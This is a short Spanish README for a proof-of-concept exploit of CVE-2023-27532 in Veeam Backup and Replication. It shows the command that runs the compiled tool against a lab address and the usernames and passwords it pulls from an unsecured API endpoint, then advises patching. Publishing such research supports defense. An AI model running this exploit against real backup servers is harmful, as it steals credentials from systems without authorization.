
Exploit de prueba de concepto para CVE-2023-27532 en Veeam Backup and Replication que abusa de un endpoint de API no seguro para extraer credenciales del sistema objetivo.
PoC para CVE-2023-27532 que afecta a Veeam Backup and Replication
En nuestro blog se puede encontrar un análisis técnico de la causa raíz de la vulnerabilidad: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive
Este PoC abusa de un endpoint API no seguro para extraer credenciales.
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password =
UserName = root Password =
UserName = root Password =
UserName = root Password =
Actualice a la última versión o mitigue siguiendo las instrucciones dentro del aviso de Veeam
Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando se haya autorizado explícitamente. Los mantenedores del proyecto no son responsables ni se les puede atribuir el mal uso del software. Úselo de manera responsable.